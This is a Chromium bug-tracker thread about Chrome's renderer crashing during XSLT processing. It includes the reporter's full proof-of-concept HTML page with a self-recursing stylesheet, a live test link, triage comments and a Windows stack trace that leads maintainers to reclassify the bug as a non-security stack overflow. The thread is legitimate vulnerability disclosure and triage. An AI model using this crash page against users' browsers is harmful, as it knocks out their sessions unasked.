Chrome crashes during XSLT processing.
Reported by
proof131...@gmail.com,
Oct 23
|
||||||||
Issue descriptionUserAgent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36 Steps to reproduce the problem: POC: <!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <script id=o_xml type="text/plain"><?xml version="1.0" encoding="UTF-8"?> <tag_name/> </script> <script id=o_xslt type="text/plain"><?xml version="1.0" encoding="UTF-8"?> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform" version="42"> <xsl:template match="*"> <xsl:apply-imports/> <xsl:apply-templates select="."> <xsl:with-param name="whatever_1">whatever_2</xsl:with-param> </xsl:apply-templates> </xsl:template> </xsl:stylesheet> </script> <script> window.onload = function(){ setTimeout(function(){ window.close(); }, 400); let doc = new DOMParser(), proc = new XSLTProcessor(); proc.importStylesheet(doc.parseFromString(document.getElementById('o_xslt').textContent, "text/xml")); proc.transformToFragment(doc.parseFromString(document.getElementById('o_xml').textContent, "text/xml"), document); }; </script> </head> </html> Test live on: http://pwning.click/xsltproc.html What is the expected behavior? Chrome doesn't crash during XSLT processing. What went wrong? Chrome crashes during XSLT processing. Did this work before? N/A Chrome version: 69.0.3497.100 Channel: stable OS Version: 10.0 Flash Version:
,
Oct 24
We're not able to reproduce this crash. Are you able to provide any more information (e.g. a stacktrace) for this crash? You may also provide a crash ID: https://www.chromium.org/for-testers/bug-reporting-guidelines/reporting-crash-bug
,
Oct 24
Testcase 5664736149241856 failed to reproduce the crash. Please inspect the program output at https://clusterfuzz.com/testcase?key=5664736149241856.
,
Oct 30
I can reproduce it locally on Canary on Windows. Crash ID 9626b78a54990cb8. Can a Blink>XML OWNER please take a look? Thanks!
,
Oct 31
Unfortunately, the stack trace for that crash ID is quite useless! It's Windows-specific, and indeed I cannot reproduce this bug on Chrome OS. XSLT might be tickling a Windows bug...? I'm going to pessimistically call this potential renderer memory corruption and rate it accordingly. If that turns out to be wrong, go right ahead and re-label the bug.
,
Oct 31
It's a stack overflow, I assume that's pretty common in user-supplied xml/xslt, but I dunno. Do we treat stack overflows differently than OOM?
,
Nov 1
,
Nov 15
scottmg: Uh oh! This issue still open and hasn't been updated in the last 14 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Nov 29
scottmg: Uh oh! This issue still open and hasn't been updated in the last 28 days. This is a serious vulnerability, and we want to ensure that there's progress. Could you please leave an update with the current status and any potential blockers? If you're not the right owner for this issue, could you please remove yourself as soon as possible or help us find the right one? If the issue is fixed or you can't reproduce it, please close the bug. If you've started working on a fix, please set the status to Started. Thanks for your time! To disable nags, add the Disable-Nags label. For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
,
Dec 4
Stack overflow is the same as OOM, yeah. Also, I cannot reproduce this on Stable (70) on macOS. dcheng: scottmg is no longer on Chrome, and you're our only remaining XML OWNER! Could you please confirm the stack overflow hypothesis (seems likely?), and re-label this bug appropriately? Thanks!
,
Dec 5
I'm happy to call this a stack overflow 00 0000003a`e6a03fd0 00007ffc`869e111b ntdll!RtlAllocateHeap+0x16d 01 0000003a`e6a04090 00007ffc`89b4b234 chrome_child!malloc+0x2b [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\base\allocator\allocator_shim_override_ucrt_symbols_win.h @ 53] 02 0000003a`e6a040d0 00007ffc`89b54bb0 chrome_child!xmlXPathNewNodeSet+0x14 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxml\src\xpath.c @ 4345] 03 0000003a`e6a04110 00007ffc`89b54a8c chrome_child!xmlXPathCompOpEval+0x938 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxml\src\xpath.c @ 13457] 04 0000003a`e6a041c0 00007ffc`89b5138b chrome_child!xmlXPathCompOpEval+0x814 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxml\src\xpath.c @ 13965] 05 0000003a`e6a04270 00007ffc`89b511b6 chrome_child!xmlXPathRunEval+0xc8 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxml\src\xpath.c @ 14545] 06 0000003a`e6a042b0 00007ffc`89b5101a chrome_child!xmlXPathCompiledEvalInternal+0x183 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxml\src\xpath.c @ 14913] 07 0000003a`e6a04370 00007ffc`8a77a3f8 chrome_child!xmlXPathCompiledEval+0x2b [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxml\src\xpath.c @ 14960] 08 0000003a`e6a043b0 00007ffc`8a77acb9 chrome_child!xsltPreCompEval+0x48 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 383] 09 0000003a`e6a04400 00007ffc`8a778294 chrome_child!xsltApplyTemplates+0xc5 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 4891] 0a 0000003a`e6a04530 00007ffc`8a777d81 chrome_child!xsltApplySequenceConstructor+0x275 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 2771] 0b 0000003a`e6a045f0 00007ffc`8a777611 chrome_child!xsltApplyXSLTTemplate+0x419 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 3227] 0c 0000003a`e6a04670 00007ffc`8a77b0f7 chrome_child!xsltProcessOneNode+0x44 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 0] 0d 0000003a`e6a046c0 00007ffc`8a778294 chrome_child!xsltApplyTemplates+0x503 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 5141] 0e 0000003a`e6a047f0 00007ffc`8a777d81 chrome_child!xsltApplySequenceConstructor+0x275 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 2771] 0f 0000003a`e6a048b0 00007ffc`8a777611 chrome_child!xsltApplyXSLTTemplate+0x419 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 3227] 10 0000003a`e6a04930 00007ffc`8a77b0f7 chrome_child!xsltProcessOneNode+0x44 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 0] 11 0000003a`e6a04980 00007ffc`8a778294 chrome_child!xsltApplyTemplates+0x503 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 5141] 12 0000003a`e6a04ab0 00007ffc`8a777d81 chrome_child!xsltApplySequenceConstructor+0x275 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 2771] 13 0000003a`e6a04b70 00007ffc`8a777611 chrome_child!xsltApplyXSLTTemplate+0x419 [C:/b/c/b/win64_clang/src/out/Release_x64\..\..\third_party\libxslt\src\libxslt\transform.c @ 3227] I didn't test on Mac / ChromeOS though, so I can't comment on why it doesn't repro there. (palmer, I'm not sure what other labels OOM bugs should get, but I made it non-security at least) |
||||||||
►
Sign in to add a comment |
||||||||
Comment 1 by ClusterFuzz
, Oct 24